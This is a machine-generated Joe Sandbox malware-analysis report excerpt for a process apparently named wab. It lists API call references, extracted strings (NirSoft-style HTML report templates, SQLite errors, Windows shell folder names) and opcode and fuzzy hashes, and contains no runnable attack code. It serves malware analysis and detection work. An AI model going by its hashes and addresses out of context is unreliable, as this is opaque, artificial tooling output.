                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf
                                                                                            • String ID: %%0.%df
                                                                                            • API String ID: 3473751417-763548558
                                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                                            • GetParent.USER32(?), ref: 00406136
                                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                            • String ID: A
                                                                                            • API String ID: 2892645895-3554254475
                                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                            • memset.MSVCRT ref: 0040DA23
                                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                            • String ID: caption
                                                                                            • API String ID: 973020956-4135340389
                                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                            • API String ID: 1283228442-2366825230
                                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • wcschr.MSVCRT ref: 00413972
                                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                                            • memset.MSVCRT ref: 004139B8
                                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                            • memset.MSVCRT ref: 00413A00
                                                                                            • memcpy.MSVCRT ref: 00413A1B
                                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                            • String ID: \systemroot
                                                                                            • API String ID: 4173585201-1821301763
                                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy
                                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                            • API String ID: 1284135714-318151290
                                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                            • String ID: 0$6
                                                                                            • API String ID: 4066108131-3849865405
                                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004082EF
                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                            • memset.MSVCRT ref: 00408362
                                                                                            • memset.MSVCRT ref: 00408377
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 290601579-0
                                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memchrmemset
                                                                                            • String ID: PD$PD
                                                                                            • API String ID: 1581201632-2312785699
                                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                            • String ID:
                                                                                            • API String ID: 2163313125-0
                                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$wcslen
                                                                                            • String ID:
                                                                                            • API String ID: 239872665-3916222277
                                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$_snwprintfmemset
                                                                                            • String ID: %s (%s)$YV@
                                                                                            • API String ID: 3979103747-598926743
                                                                                            • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                            • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                            • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                            • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                            • wcslen.MSVCRT ref: 0040A6B1
                                                                                            • wcscpy.MSVCRT ref: 0040A6C1
                                                                                            • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                            • wcscpy.MSVCRT ref: 0040A6DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                            • String ID: Unknown Error$netmsg.dll
                                                                                            • API String ID: 2767993716-572158859
                                                                                            • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                            • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                            • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 0040DAFB
                                                                                            • wcscpy.MSVCRT ref: 0040DB0B
                                                                                            • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                              • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                            • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                            • API String ID: 3176057301-2039793938
                                                                                            • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                            • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                            • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • too many attached databases - max %d, xrefs: 0042F64D
                                                                                            • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                            • database %s is already in use, xrefs: 0042F6C5
                                                                                            • out of memory, xrefs: 0042F865
                                                                                            • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                            • unable to open database: %s, xrefs: 0042F84E
                                                                                            • database is already attached, xrefs: 0042F721
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                            • API String ID: 1297977491-2001300268
                                                                                            • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                            • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                            • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                            • memcpy.MSVCRT ref: 0040EB80
                                                                                            • memcpy.MSVCRT ref: 0040EB94
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                            • String ID: ($d
                                                                                            • API String ID: 1140211610-1915259565
                                                                                            • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                            • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                            • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                            • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                            • GetLastError.KERNEL32 ref: 004178FB
                                                                                            • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ErrorLastLockSleepUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3015003838-0
                                                                                            • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                            • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                            • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00407E44
                                                                                            • memset.MSVCRT ref: 00407E5B
                                                                                            • _mbscpy.MSVCRT ref: 00407E7E
                                                                                            • _mbscpy.MSVCRT ref: 00407ED7
                                                                                            • _mbscpy.MSVCRT ref: 00407EEE
                                                                                            • _mbscpy.MSVCRT ref: 00407F01
                                                                                            • wcscpy.MSVCRT ref: 00407F10
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 59245283-0
                                                                                            • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                            • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                            • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                            • GetLastError.KERNEL32 ref: 0041855C
                                                                                            • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                            • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                            • GetLastError.KERNEL32 ref: 0041858E
                                                                                            • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                            • String ID:
                                                                                            • API String ID: 3467550082-0
                                                                                            • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                            • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                            • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                            • API String ID: 3510742995-3273207271
                                                                                            • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                            • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                            • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
